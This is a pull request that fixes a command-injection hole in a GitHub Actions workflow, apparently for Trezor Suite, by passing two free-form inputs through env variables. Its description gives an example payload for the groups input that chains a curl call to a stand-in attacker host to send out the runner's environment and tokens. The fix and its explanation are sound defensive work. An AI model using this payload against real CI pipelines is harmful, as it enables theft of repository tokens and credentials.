### PR TITLE
fix(ci): test-connect-custom input injection

### DIFF
--- a/.github/workflows/test-connect-custom.yml
+++ b/.github/workflows/test-connect-custom.yml
@@ -51,7 +51,17 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
       - name: Generate matrix
         id: generate
-        run: echo "matrix=$(node ./scripts/ci/connect-test-matrix-generator.js --model=${{ inputs.deviceModel }} --firmware=${{ inputs.deviceVersion }} --env=${{ inputs.testEnv }} --groups=${{ inputs.groups }} --transport=${{ inputs.transport }} --disable_cache_tx=false)" >> $GITHUB_OUTPUT
+        env:
+          DEVICE_VERSION: ${{ inputs.deviceVersion }}
+          TEST_GROUPS: ${{ inputs.groups }}
+        run: |
+          echo "matrix=$(node ./scripts/ci/connect-test-matrix-generator.js \
+            --model=${{ inputs.deviceModel }} \
+            --firmware="$DEVICE_VERSION" \
+            --env=${{ inputs.testEnv }} \
+            --groups="$TEST_GROUPS" \
+            --transport=${{ inputs.transport }} \
+            --disable_cache_tx=false)" >> "$GITHUB_OUTPUT"
 
   custom-check:
     needs: [set-matrix]


### PR DESCRIPTION
<!--- Provide a general summary of your changes in the Title above -->

## Description from secutiry agent

Who can trigger it: anyone with workflow_dispatch permission on the repo — i.e. collaborators with at minimum Write access.
Payload example for groups:
all; curl https://attacker.com/?d=$(env | base64 -w0) #
After GitHub Actions expression expansion, bash executes:
echo "matrix=$(node ... --groups=all; curl https://attacker.com/?d=$(env | base64 -w0) #...)" >> $GITHUB_OUTPUT

Which runs:

1. node ... --groups=all— the legitimate command
2. curl https://attacker.com/?...— exfiltrates the entire runner environment

What's in the runner environment at that point:

- GITHUB_TOKEN— always present, scoped to the repo
- secrets.*— none are passed to this specific job (noenv:blocks using secrets visible), butGITHUB_TOKENalone is enough to read repo contents, create issues, etc.
- git credentials written byactions/checkoutto the runner's credential store
Is this worse than direct repo access? Slightly — it's deniable, automated, and the attacker gets live runner-environment tokens that may have broader API scope than their own PAT.

Fix:

move the two free-form inputs through env: variables.

The type: choice inputs (deviceModel, testEnv, transport) are safe to keep inline since GitHub validates them against the enum at trigger time. Only the two type: string inputs need the env-variable indirection.

<!-- LLM-TEST-SELECTOR:DETAILS:START -->
<details>
<summary><h3>🤖 LLM Test Recommendations</h3></summary>

<!-- LLM-TEST-SELECTOR:START -->
**Summary:** No relevant source file changes detected against origin/develop.

_No test recommendations found._

_Updated: 2026-06-08T13:47:55.883Z_
<!-- LLM-TEST-SELECTOR:END -->
</details>
<!-- LLM-TEST-SELECTOR:DETAILS:END -->

<!-- CURRENTS-LINKS:SECTION:START -->
## 🔍 Currents Test Results

<!-- CURRENTS-LINK:DESKTOP:START -->
🔍 **Suite desktop test results:** [View in Currents](https://app.currents.dev/projects/4ytF0E/runs?branch=fix/ci-connect-custom&lookback=7)
<!-- CURRENTS-LINK:DESKTOP:END -->
<!-- CURRENTS-LINK:WEB:START -->
🔍 **Suite web test results:** [View in Currents](https://app.currents.dev/projects/Og0NOQ/runs?branch=fix/ci-connect-custom&lookback=7)
<!-- CURRENTS-LINK:WEB:END -->
<!-- CURRENTS-LINKS:SECTION:END -->

<!-- QUARANTINE-LIST:HEADING:START -->
## 🔒 Quarantined E2E Tests
<!-- QUARANTINE-LIST:HEADING:END -->

<!-- QUARANTINE-LIST:web:START -->
<details><summary>Trezor Suite (web) — 7 test(s)</summary>

| Test | Type |
|------|------|
| Account metadata > dropbox provider | 🤖 auto |
| sol staking > display stake rewards on SOL staking account | 🤖 auto |
| Account types suite > Add-account-types-non-BTC-coins | 🤖 auto |
| Quarantine test: "Onboarding - create wallet,Success (basic)" | 🙋 manual |
| Quarantine test: "Database migration,Db migration between: release/22.5/web => develop/web" | 🙋 manual |
| Quarantine test: "Multiple sessions,Session overtaken by another" | 🙋 manual |
| Quarantine test: "Recovery T2T1 - dry run,Recovery after partial recovery" | 🙋 manual |

</details>

_Updated: 2026-06-08T16:06:55.859Z • 7 test(s) total_
<!-- QUARANTINE-LIST:web:END -->

<!-- QUARANTINE-LIST:desktop:START -->
<details><summary>Trezor Suite (desktop) — 6 test(s)</summary>

| Test | Type |
|------|------|
| Account types suite > Add account types ada | 🤖 auto |
| Send Base > User can perform ethereum sending on base network | 🤖 auto |
| Send Base > User can set custom fees | 🤖 auto |
| Labeling migration > Migration from local file | 🤖 auto |
| Onboarding - create wallet > Success (basic) | 🤖 auto |
| Quarantine test: "Multiple sessions,Session overtaken by another" | 🙋 manual |

</details>

_Updated: 2026-06-08T16:04:38.116Z • 6 test(s) total_
<!-- QUARANTINE-LIST:desktop:END -->

<!-- PREVIEW-LINKS:SECTION:START -->
## 🌐 Preview deployments

<!-- PREVIEW-LINK:SUITE-WEB:START -->
🌐 **Suite Web preview:** [https://dev.suite.sldev.cz/suite-web/fix/ci-connect-custom/web/](https://dev.suite.sldev.cz/suite-web/fix/ci-connect-custom/web/)
<!-- PREVIEW-LINK:SUITE-WEB:END -->
<!-- PREVIEW-LINKS:SECTION:END -->